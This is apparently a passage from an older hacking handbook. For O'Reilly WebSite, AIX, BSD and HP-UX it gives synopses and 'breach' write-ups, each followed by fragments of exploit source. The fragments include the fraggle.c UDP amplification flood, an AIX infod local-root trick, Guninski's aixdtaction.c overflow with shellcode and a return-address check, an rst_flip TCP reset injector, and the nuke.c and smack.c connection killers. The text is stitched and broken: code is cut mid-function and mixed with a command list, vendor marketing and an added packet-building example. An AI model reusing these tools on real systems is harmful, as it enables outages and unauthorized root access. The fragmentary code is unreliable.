DUZOA=`perl -e '{ print "A"x4093} '`
O’Reilly WebSite Professional
Rated as one of the fastest-growing personal and corporate Internet server daemons, WebSite Professional (http://website.oreilly.com) is among the most robust Web servers on the market (see Figure 9.10). With custom CGI and Perl support, plus VBScript, JavaScript, Python, and Microsoft ASP scripting, this suite is unmatched in ease of use and programmability. With this product, an average neophyte could build a standard Web server configuration in minutes.
Figure 9.10 WebSite Professional administration
Liabilities
Denial-of-Service Attack
Synopsis: WebSite Professional is vulnerable to a DoS attack that drives the host CPU to saturation, degrading or stalling service.
Hack State: Severe congestion
Vulnerabilities: All revisions
Breach: This DoS attack (fraggle.c) pushes system CPU utilization to 100 percent immediately. Repeated attacks sustain CPU load at 68 to 85 percent, rising to 100 percent if the server is simultaneously flooded with HTTP requests. fraggle.c is a UDP amplification flood: it sends UDP packets with the victim's address forged as the source to a list of broadcast addresses (the "bcast file" in the usage text below; destination port 7, the echo service, by default), so every host on those networks answers the victim at once. Nothing in the attack is specific to the Web server software; any host reachable from the amplifying networks can be targeted. The usual defenses are ingress filtering of forged source addresses and disabling directed broadcasts and the echo service on intermediate networks.
void sigint (int);
unsigned short checksum (u_short *, int);
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
int s, num, delay, n, cycle;
char **bcast = malloc(1024), buf[32];
" [dstport] [srcport] [psize] \n\n"
"target\t\t= address to hit\n"
"bcast file\t= file containing broadcast addrs\n"
"num packets\t= send n packets (n = 0 is constant)\n"
"packet delay\t= usleep() between packets (in ms)\n"
"dstport\t\t= port to hit (default 7)\n"
"srcport\t\t= source port (0 for random)\n" "ps\t\t= packet size\n\n",
/* open bcast file and build array */
if ((bfile = fopen(argv[2], "r")) == NULL)
/* create our raw socket */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
{
perror("creating raw socket");
srand(time(NULL) * rand() * getpid());
fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
struct iphdr *ip;
struct udphdr *udp;
char *packet;
int r;
packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) +
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
Operating systems are generally classified according to their host system functions, which may include supercomputers, mainframes, servers, workstations, desktops, and even handheld devices. The O/S dictates how data is saved to storage devices; it keeps track of filenames, locations, and security, while controlling all connected devices (as shown in Figure 10.1). When a computer is powered on, the operating system loads itself into memory, initializes, and runs other programs. While those programs run, the O/S continues to operate in the background. Popular operating systems include DOS, Microsoft Windows, MacOS, SunOS, and UNIX.
Figure 10.1 Operating system functionality
Hackers have been exploiting these operating systems since the beginning of their development, so the purpose of this section is to introduce the various hacking techniques used to manipulate them. The investigation will cover AIX, BSD, Digital, HP/UX, IRIX, UNIX, Linux, Macintosh, Windows, OS/2, SCO, Solaris, and VAX/VMS. We'll begin with UNIX.
UNIX
There are numerous exploits for every UNIX operating system type, and although extensive cross-platform testing has not been performed or documented, many exploits are interchangeable or can be modified for use on other UNIX variants. Common breach methods against all UNIX flavors include root exploitation, buffer overflow attacks, flooding, and the port daemon hijacking described earlier.
The following list of common UNIX commands can be used as a reference when working through the exploits in this section:
alias      View (or define) shell aliases
awk        Pattern scanning and text-processing language
bdiff      Compare two large files (diff for big files)
bfs        Big file scanner (read-only editor for large files)
cal        Show calendar
cat        Concatenate and print files
cc         C compiler
cd         Change directory
chgrp      Change group ownership
chmod      Change file permissions
chown      Change file ownership
cmp        Compare two files byte by byte
comm       Select or reject lines common to two sorted files
cp         Copy files
cu         Call another UNIX system (serial line or modem)
date       Show date and time
df         Report free space on mounted filesystems
diff       Display differences between two files
du         Show disk usage in blocks
echo       Write arguments to the screen (or, via redirection, to a file)
ed         Line-oriented text editor
env        List current environment variables, or run a command with a modified environment
ex         Line-oriented text editor (the line mode of vi)
expr       Evaluate an expression
find       Find files by name, owner, permissions, age, and so on
f77        Fortran 77 compiler
format     Initialize and partition a disk (Solaris)
grep       Search for a pattern within files
help       Help
kill       Send a signal to a process (by default, terminate it)
ln         Create a link between two files
ls         List the files in a directory
mail       Send/receive mail
mkdir      Make directory
more       Page through a file one screen at a time
mv         Move or rename a file
nohup      Run a command immune to hangups, so it keeps running after logout
nroff      Format text
passwd     Change password
pkgadd     Install a software package (Solaris/SVR4)
ps         List the current running processes
pwd        Display the name of the working directory
rm         Remove files
rmdir      Remove directory
set        List shell variables (or set shell options)
setenv     Set environment variables (csh)
sleep      Delay for a specified number of seconds
source     Execute the commands in a file within the current shell (csh)
sort       Sort lines of text files
spell      Check for spelling errors
split      Divide a file into pieces
stty       Set terminal options
tail       Display the end of a file
tar        Archive files into (or extract them from) a single tape-archive file; it does not compress by itself
touch      Update a file's timestamps, creating an empty file if none exists
troff      Format output for typesetting
tset       Set terminal type
umask      Set the file-creation permission mask
uniq       Report or remove adjacent duplicate lines
uucp       UNIX-to-UNIX copy/execute
vi         Full-screen text editor
volcheck   Check for mounted removable media such as floppies (Solaris)
wc         Count lines, words, and bytes
who        Show logged-in users
write      Send a message to another user
!          Repeat a previous command (csh history)
AIX
AIX, by IBM (www.ibm.com), is an integrated flavor of the UNIX operating system that supports 32-bit and 64-bit systems. The computers that run AIX include the entire range of RS/6000 systems, from entry-level servers and workstations to powerful supercomputers such as the RS/6000 SP. Interestingly, AIX was the first O/S in its class to achieve independent security evaluations and to support options including C2 and B1 functions (see Part 3 for security class explanations). Also, thanks to new Web-based management systems, it is possible to remotely manage AIX systems from anywhere on the Internet, as illustrated in Figure 10.2.
Figure 10.2 Remote AIX network configuration
Liabilities
Illuminating Passwords
Synopsis: A diagnostic command copies the shadowed password hashes (the output of the one-way hash algorithm) into a directory under /tmp, where a local user can find them.
Hack State: Password exposure
Vulnerabilities: AIX 3.x/4.x
Breach: When troubleshooting, AIX support teams generally request the output of the snap -a command. As a diagnostic tool, this command gathers system information (including the password file with its hashes) into a directory on free disk space. An attacker can therefore target the /tmp/ibmsupt/general/ directory, locate the copied password file, and bypass password shadowing altogether. Check the permissions on /tmp/ibmsupt after every snap run, and delete the output as soon as support has received it.
Local Root via infod
Synopsis: The AIX infod daemon can be tricked into spawning a root shell.
Hack State: Unauthorized root access
Vulnerabilities: AIX 3.x/4.x
Breach: The Info Explorer module in AIX centralizes documentation. Its daemon, infod, performs no validation on data received over the UNIX-domain socket it is bound to (note the struct sockaddr_un in the code below), so this is a local attack rather than a remote one. A local user can send a forged request that makes the daemon open a connection to the attacker's X display; by supplying a fabricated environment together with a user ID (UID) and group ID (GID) of 0, the daemon is forced to spawn that connection with root privileges. The program infod.c, by Arisme, demonstrates this:
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window … if you have problems check
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{
/* French identifiers: chaussette = socket, taille = size, expediteur = sender, pointeur = pointer */
struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); send_environ(buffer,param);
Synopsis: AIX dtaction mishandles the HOME environment variable, yielding a local root shell.
Hack State: Unauthorized root access
Vulnerabilities: AIX 4.2
Breach: /usr/dt/bin/dtaction on AIX 4.2 copies the HOME environment variable into a fixed-size stack buffer without a length check. aixdtaction.c, by Georgi Guninski, overflows that buffer with a crafted HOME value (a NOP sled, the shellcode, and a return address that must contain no zero bytes, as the check in the code shows) so that dtaction returns into the shellcode and spawns a root shell. The exploit runs locally; it is not a remote attack.
/*
 * aixdtaction.c
 * Use the IBM C compiler
 * Compile with: cc -g aixdtaction.c
 * DISPLAY should be set
 */
#include <stdlib.h>
#include <string.h>
char *prog="/usr/dt/bin/dtaction";
char *prog2="dtaction";
extern int execv();
char *createvar(char *name,char *value)
4e800420 bctr jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn=100;
int max=280;
unsigned int toc;
unsigned int eco;
i=nop+strlen( (char*) &code)/4-1;
/* every byte of the return address must be nonzero, or the string copy would stop short */
if( !(reta & 0xff) || !(reta & 0xff00) || !(reta & 0xff0000)
|| !(reta & 0xff000000))
{
perror("Return address has zero");exit(5);
perror("Error executing execve \n");
/* Georgi Guninski guninski@hotmail.com
http://www.geocities.com/ResearchTriangle/1711*/
}
Vulnerabilities: BSD flavors
Breach: The usage is quite simple:
rst_flip <A> <B> <A port low> <A port hi> <B port low> <B port hi>
where A and B are the two endpoints of the target session, and each port range brackets the ports that session may be using; the tool then sends forged TCP RST segments for every port pair in those ranges.
#define IPHDR sizeof(struct iphdr)
#define PACKETSIZE TCPHDR + IPHDR
#define SLEEPTIME 30000 // depending on how fast you can barf
#define LO_RST 1 // the packets out
#define HI_RST 2147483647 // do not ask me about this :)
#define ERROR_FAILURE -1
#define ERROR_SUCCESS 0
void resolve_address(struct sockaddr *, char *, u_short);
unsigned short in_cksum(unsigned short *,int );
int send_rst(char *, char *, u_short ,u_short , u_long, u_long,u_long);
int main(int argc, char *argv[])
printf ("usage: <source> <destination> <source_port_hi> <source_port_lo> <dest_port_hi> <dest_port_lo>\n[
// here we put it together
int send_rst(char *fromhost, char *tohost, u_short fromport,u_short toport, u_long ack_sq, u_long s_seq, u_long spoof_id)
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
tpack.tcp.ack_seq=ntohl(ack_sq); /* 32-bit Acknowledgement Number */
tpack.tcp.doff=5; /* Data offset */
tpack.tcp.rst=1; /* Reset flag */
tpack.tcp.syn=0; /* Synchronize sequence numbers flag */
tpack.tcp.fin=0; /* Finish sending flag */
/* 16-bit Total length */
tpack.ip.id=htons(spoof_id); /* 16-bit ID field */
tpack.ip.frag_off=0; /* 13-bit Fragment offset */
tpack.ip.ttl=64; /* 8-bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
tpack.ip.check=0; /* 16-bit Header checksum (filled in below) */
tpack.ip.saddr=local_sin.sin_addr.s_addr; /* 32-bit Source Address */
tpack.ip.daddr=remote_sin.sin_addr.s_addr; /* 32-bit Destination Address */
// IP header checksum
tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
sum += (sum >> 16); // add carry
answer = ~sum; //
ones-complement, then truncate to 16 bits
return(answer);
}
// Resolve the address and populate the sin structs
void resolve_address(struct sockaddr * addr, char *hostname, u_short port)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
Breach: This DoS attack, modified by Iron Lungs, results in platform freezes, as the victim receives thousands of packets from the customizable addresses listed between the /* Start */ and /* End */ customizing sections.
97,105,109,92,48,92,109,115,103,92,49,92,114,97,116,
101,92,50,53,48,48,92,98,111,116,116,111,109,99,111,
108,111,114,92,49,98,92,116,111,112,99,111,108,111,114,
92,110,97,109,101,92,83,110,111,111,112,121,34,10
int addserv(char *, unsigned int, char);
int main(int argc, char *argv[])
{
iph = (struct ip *)pack;
udph = (struct udphdr *)(iph + 1);
if (argc < 2) {
printf("Usage: %s <target>\n", argv[0]); exit(-1);
char ip[16], tmp[6], mode, tmp2;
unsigned int port;
bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0;
memcpy(udph + 1, conn_pack1, strlen(conn_pack1));
ret = sendto(s, pack, PS1, 0, (struct sockaddr *)&addr,
• 64-bit power: Runs larger applications and processes large data sets faster
• Industry-leading performance: Achieved via V-Class and N-Class servers
• Broadest application portfolio: Cost-effectively delivers leading packaged application software
• Easy upgrades: Enables unmodified use of 9.x or 10.x applications (also runs 32-bit and 64-bit side by side)
• Widely supported: Compatible with the full line of HP 9000 Enterprise servers
• Superior scalability: Simplifies the move from 1- to 128-way computing within the same system
• Improved resilience: Maximizes uptime
• Top security: Secures applications ranging from communications to business transactions
• Ready for e-services: Supports HP's Internet e-commerce strategy
• Ready for IA-64: Binary compatibility smooths the transition to the next-generation IA-64 architecture
• Promising future: Backed by the resources and expertise of HP
Liabilities
Denial-of-Service Attack
Synopsis: DoS attack that can potentially terminate an IP connection
Hack State: Severe congestion
Vulnerabilities: All flavors
Breach: nuke.c, by Satanic Mechanic, is a DoS attack that can kill almost any TCP connection by sending forged ICMP Destination Unreachable messages for it. Each message carries the IP header and first bytes of a segment belonging to the target connection (the 64 bytes appended after the ICMP header in the code), and a host that trusts the message tears the connection down.
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
 * Our algorithm is simple: using a 32-bit accumulator (sum),
 * we add sequential 16-bit words to it, and at the end, fold
 * back all the carry bits from the top 16 bits into the lower 16 bits.
 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
struct sockaddr_in name;
struct sockaddr dest,uspoof;
char *buf = (char *) malloc(sizeof(struct icmp)+64);
mp = (struct icmp *) buf;
if (resolve_host(host,&dest) <0) return(-1);
if (resolve_host(uhost,&uspoof) <0) return(-1);
if ((proto = getprotobyname("icmp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\"\n",stderr);
/* Bind it to the port */
rc = bind(s, (struct sockaddr *) & name, sizeof(name));
if (rc == -1) {
perror("bind");
return(-1);
}
if ((proto = getprotobyname("tcp")) == NULL) {
fputs("unable to determine protocol number of \"tcp\"\n",stderr);
mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest)))
if (argc == 4) type = DEFAULT_UNREACH;
else type = resolve_unreach_type(argv[4]);
if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
fputs("invalid unreachable type",stderr);
exit(1);
}
if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
exit(0);
}
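The header assembly that rst_flip performs field by field above, and the RFC 1071 checksum routine whose comment nuke.c carries, as one added example written for this edit (not code from the book or from the exploit authors): it implements the word-sum-and-fold checksum, lays out an IPv4 header and a TCP RST|ACK segment in a byte buffer, computes the TCP checksum over the pseudo-header, and then verifies both checksums the way a receiver would. Addresses, ports and sequence numbers are constructed sample values; the reference IPv4 header is a constructed 20-byte header whose known checksum is 0xb861. The packet is built and checked in memory rather than sent, so it needs no raw socket or privileges.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Internet checksum (RFC 1071), the algorithm the in_cksum() fragments above implement:
   add the data as 16-bit big-endian words into a 32-bit accumulator, fold the carries
   back into the low 16 bits, return the one's complement. Result is in host order;
   store it big-endian (put16 below, or htons()). */
uint16_t in_cksum(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;

    while (len > 1) {
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len == 1)                         /* odd trailing byte is padded with a zero */
        sum += (uint32_t)(p[0] << 8);
    while (sum >> 16)                     /* fold carries until none remain */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Byte-level helpers so the layout does not depend on Linux-only struct iphdr/tcphdr. */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

#define IP_HLEN  20
#define TCP_HLEN 20
#define RST_LEN  (IP_HLEN + TCP_HLEN)
#define TCP_MAX  1500

/* TCP checksum: over the 12-byte pseudo-header (saddr, daddr, zero, protocol 6,
   TCP length) followed by the segment. Returns 0 when the segment's checksum
   field is already filled in correctly. */
uint16_t tcp_cksum(const uint8_t *ip_pkt, size_t tcp_len)
{
    uint8_t buf[12 + TCP_MAX];

    if (tcp_len > TCP_MAX)
        return 0xffff;
    memcpy(buf, ip_pkt + 12, 8);          /* saddr and daddr straight from the IP header */
    buf[8] = 0;
    buf[9] = 6;                           /* IPPROTO_TCP */
    put16(buf + 10, (uint16_t)tcp_len);
    memcpy(buf + 12, ip_pkt + IP_HLEN, tcp_len);
    return in_cksum(buf, 12 + tcp_len);
}

/* Build a 40-byte IPv4 + TCP segment with RST|ACK set, the packet rst_flip
   assembles field by field. Addresses and ports are host-order values. */
size_t build_rst(uint8_t *pkt, uint32_t saddr, uint32_t daddr,
                 uint16_t sport, uint16_t dport,
                 uint32_t seq, uint32_t ack, uint16_t ip_id)
{
    uint8_t *tcp = pkt + IP_HLEN;

    memset(pkt, 0, RST_LEN);
    pkt[0] = 0x45;                        /* version 4, IHL 5 (20 bytes) */
    put16(pkt + 2, RST_LEN);              /* total length */
    put16(pkt + 4, ip_id);                /* identification */
    put16(pkt + 6, 0x4000);               /* DF set, fragment offset 0 */
    pkt[8] = 64;                          /* TTL */
    pkt[9] = 6;                           /* protocol TCP */
    put32(pkt + 12, saddr);
    put32(pkt + 16, daddr);

    put16(tcp, sport);
    put16(tcp + 2, dport);
    put32(tcp + 4, seq);
    put32(tcp + 8, ack);
    tcp[12] = 5 << 4;                     /* data offset 5 words, no options */
    tcp[13] = 0x14;                       /* flags: ACK (0x10) | RST (0x04) */
    put16(tcp + 14, 0);                   /* window: a RST advertises none */

    /* Checksums last: TCP over the pseudo-header, then the IP header alone. */
    put16(tcp + 16, tcp_cksum(pkt, TCP_HLEN));
    put16(pkt + 10, in_cksum(pkt, IP_HLEN));
    return RST_LEN;
}

/* Verification as a receiver does it: a correct checksum makes the sum come out to zero. */
int ip_cksum_ok(const uint8_t *pkt)                 { return in_cksum(pkt, IP_HLEN) == 0; }
int tcp_cksum_ok(const uint8_t *pkt, size_t tcp_len) { return tcp_cksum(pkt, tcp_len) == 0; }

/* Constructed reference header (192.168.0.1 -> 192.168.0.199, UDP, total length 115)
   whose checksum field holds 0xb861; zeroing that field and recomputing must give it back. */
static const uint8_t ref_iphdr[IP_HLEN] = {
    0x45, 0x00, 0x00, 0x73, 0x00, 0x00, 0x40, 0x00, 0x40, 0x11, 0xb8, 0x61,
    0xc0, 0xa8, 0x00, 0x01, 0xc0, 0xa8, 0x00, 0xc7
};

uint16_t ref_header_cksum(void)
{
    uint8_t h[IP_HLEN];
    memcpy(h, ref_iphdr, IP_HLEN);
    h[10] = h[11] = 0;                    /* checksum field is zero while computing */
    return in_cksum(h, IP_HLEN);
}

/* Sample RST with constructed endpoints: 192.168.1.10:40000 -> 192.168.1.20:80. */
static uint8_t demo_pkt[RST_LEN];

size_t build_demo_rst(void)
{
    return build_rst(demo_pkt, 0xc0a8010a, 0xc0a80114, 40000, 80,
                     0x11223344, 0x55667788, 4242);
}

int main(void)
{
    size_t n = build_demo_rst(), i;

    printf("reference header checksum: 0x%04x\n", ref_header_cksum());
    printf("ip ok=%d tcp ok=%d\n", ip_cksum_ok(demo_pkt), tcp_cksum_ok(demo_pkt, TCP_HLEN));
    for (i = 0; i < n; i++)
        printf("%02x%s", demo_pkt[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");
    return 0;
}
```

The checksum field is zeroed before computing and written last, and the TCP checksum is computed before the IP one because the IP header does not cover the TCP payload but the TCP pseudo-header does read the IP addresses; getting that order wrong is the usual reason hand-built packets are silently dropped by the receiving stack.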
Denial-of-Service Attack
Synopsis: As explained earlier in this chapter, smack.c is a DoS attack that sends random ICMP-unreachable packets from customized random IP addresses.
Vulnerabilities: All
Breach: This DoS attack was designed as a connection killer: the victim receives an abundance of packets from the addresses inserted between the /* Insert */ and /* End */ sections.
101,92,50,53,48,48,92,98,111,116,116,111,109,99,111,
108,111,114,92,49,98,92,116,111,112,99,111,108,111,114,
92,110,97,109,101,92,83,110,111,111,112,121,34,10 };
int addserv(char *, unsigned int, char);
int main(int argc, char *argv[])
{
iph = (struct ip *)pack;
udph = (struct udphdr *)(iph + 1);
char ip[16], tmp[6], mode, tmp2;
unsigned int port;
bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0;
tmp2 = 0;
for (i = 0; i < strlen(in); i++) {
if (in[i] != ' ') {
if (in[i] != ':') {